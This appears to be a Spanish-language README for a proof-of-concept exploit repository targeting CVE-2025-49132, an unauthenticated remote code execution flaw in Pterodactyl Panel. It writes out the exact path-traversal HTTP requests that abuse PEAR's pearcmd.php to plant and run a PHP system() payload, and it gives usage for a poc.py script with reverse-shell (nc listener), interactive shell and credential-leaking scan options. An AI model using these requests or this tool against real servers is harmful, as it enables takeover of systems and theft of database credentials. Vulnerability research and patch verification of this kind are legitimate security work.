
CVE-2025-49132_PHP_PEAR_METHOD
Este repositorio contiene un exploit de prueba de concepto (PoC) para CVE-2025-49132, una vulnerabilidad crítica de ejecución remota de código no autenticada en Pterodactyl Panel en versiones anteriores a la 1.11.11.
Pterodactyl Panel es un panel gratuito y de código abierto para la gestión de servidores de juegos, desarrollado en PHP. La vulnerabilidad permite a un atacante no autenticado ejecutar comandos arbitrarios del sistema en el servidor objetivo mediante el manejo inadecuado del endpoint /locales/locale.json combinado con la funcionalidad pearcmd.php de PHP PEAR.
PHP PEAR (PHP Extension and Application Repository) es un framework y un sistema de distribución de componentes PHP reutilizables. Proporciona una herramienta de línea de comandos (pearcmd.php) que puede utilizarse para gestionar paquetes PEAR.
El archivo pearcmd.php procesa comandos a través de parámetros de URL y, cuando se combina con path traversal, puede aprovecharse para:
La vulnerabilidad existe porque:
locale en /locales/locale.json permite path traversal sin una validación adecuadapearcmd.php acepta el comando +config-create, que puede escribir archivos PHP arbitrariosUn atacante puede:
config-create para escribir código PHP malicioso en /tmpEl exploit funciona en dos etapas:
GET /locales/locale.json?+config-create+/&locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd&<?=system('id')?>+/tmp/payload.php HTTP/1.1
Host: target.com
Desglose:
+config-create+/ - Invoca la funcionalidad de creación de configuración de PEARlocale=../../../../../../usr/share/php/PEAR - Path traversal al directorio de PEARnamespace=pearcmd - Apunta al archivo pearcmd.php<?=system('id')?>+/tmp/payload.php - Payload PHP y archivo de destinoGET /locales/locale.json?locale=../../../../../../tmp&namespace=payload HTTP/1.1
Host: target.com
Desglose:
locale=../../../../../../tmp - Path traversal al directorio /tmpnamespace=payload - Incluye y ejecuta payload.phpEl exploit requiere enviar caracteres especiales (<, >, ?, =) en la URL sin codificarlos. Si estos caracteres se codifican en la URL:
<?=system('id')?> se convierte en %3C%3F%3Dsystem%28%27id%27%29%3F%3Egraph TD
A[Attacker] -->|1. Path Traversal Request| B[locale.json]
B -->|2. Traverse to PEAR| C[pearcmd.php]
C -->|3. config-create Command| D[Write PHP Payload]
D -->|4. Create File| E[payload.php]
E -->|5. File Created| F[Server Filesystem]
A -->|6. Execution Request| G[locale.json]
G -->|7. Traverse to tmp| E
E -->|8. Include and Execute| H[PHP Interpreter]
H -->|9. System Command| I[Shell Command]
I -->|10. Command Output| A
style A fill:#ff6b6b
style B fill:#4ecdc4
style C fill:#ffe66d
style E fill:#ff6b6b
style H fill:#ff6b6b
style I fill:#ff6b6b
sequenceDiagram
participant Attacker
participant Web Server
participant PEAR
participant Filesystem
participant PHP Engine
Attacker->>Web Server: GET locale.json with config-create
Web Server->>PEAR: Path Traversal to pearcmd
PEAR->>Filesystem: Create payload.php
Filesystem-->>Attacker: 200 OK
Attacker->>Web Server: GET locale.json with payload namespace
Web Server->>Filesystem: Path Traversal to payload.php
Filesystem->>PHP Engine: Include payload
PHP Engine->>PHP Engine: Execute system command
PHP Engine-->>Attacker: Command Output RCE
requestsgit clone https://github.com/xffsec/CVE-2025-49132_PEAR_METHOD.git
cd CVE-2025-49132_PEAR_METHOD
pip3 install -r requirements.txt
O manualmente:
pip3 install requests
python3 poc.py -H <target_host> -c "<command>"
# On attacker machine, start listener
nc -lvnp 4444
# Execute exploit with reverse shell
python3 poc.py -H <target_host> -r <your_ip>:4444
python3 poc.py -H <target_host> --shell
python3 poc.py -H <target_host> --fuzz
python3 poc.py -H <target_host> --scan
Comprueba CVE-2025-49132 mediante fugas de configuración (credenciales de base de datos, app key).
python3 poc.py -H <target_host> -c "whoami" -p "/opt/pear"
python3 poc.py -H <target_host> -c "id" -v
Muestra el progreso detallado (creación del payload, ruta PEAR, estado de ejecución).
usage: poc.py [-h] -H HOST [-c COMMAND] [-r REVERSE_SHELL] [--shell] [--fuzz] [--scan]
[-p PEAR_PATH] [-e ENDPOINT] [--ssl] [--timeout TIMEOUT] [-v]